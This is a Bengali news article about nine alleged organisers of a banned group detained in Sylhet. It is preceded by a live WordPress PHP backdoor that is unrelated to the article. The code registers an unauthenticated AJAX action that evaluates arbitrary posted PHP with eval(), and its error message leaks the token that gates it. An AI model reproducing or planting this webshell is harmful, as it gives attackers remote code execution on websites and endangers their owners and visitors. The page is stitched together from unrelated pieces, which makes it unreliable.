// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== সিলেটে আটক ৯ জনই গোপন দলের সংগঠক

সিলেটে আটক ৯ জনই গোপন দলের সংগঠক

সিলেট শহরের আরামবাগ আটক নিষিদ্ধ সংগঠন ‘আল্লাহর দল’এর ৯ সদস্যই একেকজন সংগঠক। তারা জেলা ও সিলেট মহানগরের বিভিন্ন থানা এলাকায় দলের সংগঠকের দায়িত্বে ছিলেন।

বৃহস্পতিবার দুপুরে সিলেট মেট্রোপলিটন পুলিশের সদর দপ্তরে সংবাদ সম্মেলনে তিনি এ তথ্য জানান অ্যান্টি টেরোরিজম ইউনিটের পুলিশ সুপার মোহিদুজ্জামান।

তিনি বলেন, ‘গোপন সংবাদের ভিত্তিতে এটিইউ’র একটি দল এ অভিযান পরিচালনা করে। এতে সহযোগিতা করে সিলেট মেট্রোপলিটন পুলিশ।’

বুধবার রাত সাড়ে ১০টার দিকে সিলেট শহরের আরামবাগের একটি বাসা থেকে তাদের আটক করা হয়।

আটক নয়জন হচ্ছেন- বগুড়া জেলার এরুলিয়া এলাকার বড় কুমিরা গ্রামের মৃত আব্দুল মান্নান আকন্দের ছেলে মানিক আকন্দ ওরফে মেহেদী হাসান (৩২), নোয়াখালি জেলার মাইজদিহি থানার কৃষ্ণপুর গ্রামের আবুল কালামের ছেলে জহির উদ্দিন বাবর (২০), সিলেটের জকিগঞ্জ উপজেলার থানাবাজারের মানিকপুর গ্রামের মৃত মোকাদ্দেস আলীর ছেলে রাসেল আহমদ (২৪), কুমিল্লা জেলার বিবির বাজার এলাকার রাজমঙ্গলপুর গ্রামের আব্দুল আলীর ছেলে আবুল কালাম আজাদ (২০), সিলেটের জকিগঞ্জ উপজেলার ঈদগাহ বাজারের খাফনা গ্রামের মুক্তাদির মিয়ার ছেলে কামাল আহমদ (২৫), সুনামগঞ্জ সদরের আলহেরা এলাকার শাহপুর গ্রামের আব্দুল আজিজের ছেলে তমি উদ্দিন সুমন (৩০), রাজশাহী জেলার বাগমাড়া এলাকার চেওখালি গ্রামের কায়েম উদ্দিনের ছেলে আশরাফুল ইসলাম (২৯), সিলেট সদর উপজেলার টুকেরবাজার এলাকার হায়দরপুর গ্রামের আব্দুস সালামের ছেলে জুয়েল আহমদ (২৪) ও সিলেটের গোলাপগঞ্জ থানার তুরস্তবাগ এলাকারম নলুয়া গ্রামের আলা উদ্দিনের ছেলে মো. স্বপন আহমদ (২১) ।

তারা সকলেই সিলেট বিভাগের বিভিন্ন জেলা ও সিলেট মহানগরের বিভিন্ন থানা এলাকায় আল্লাহর দলের সংগঠকের দায়িত্বে ছিলেন। তারা বাংলাদেশের অখন্ডতা, সংহতি, জননিরাপত্তা ও সার্বভৌমত্ব বিপন্ন করার জন্য এবং দেশের আইন-শৃঙ্খলা পরিস্থিতি অবনতি ও নাশকতা ঘটানোর উদ্দেশ্যে একত্রিত হয়ে গোপন মিটিং করছিল বলে প্রাথমিক জিজ্ঞাসাবাদে পুলিশকে জানিয়েছে।

তাদের বিরুদ্ধে মহানগর পুলিশের শাহপরাণ থানায় একটি মামলা দায়ের করা হয়েছে। ওই মামলায় তাদের আদালতের পাঠানো হবে বলেও জানানো হয়েছে সংবাদ সম্মেলনে।

সংবাদ সম্মেলনে সিলেট মেট্রোপলিটন পুলিশের অতিরিক্ত কমিশনার পরিতোষ ঘোষ, উপ-পুলিশ কমিশনার সোহেল রেজা এবং অতিরিক্ত উপ-পুলিশ কমিশনার (মিডিয়া) জেদান আল মুসা উপস্থিত ছিলেন।

এশিয়াবিডি/ডেস্ক/সাইফ

আরও সংবাদ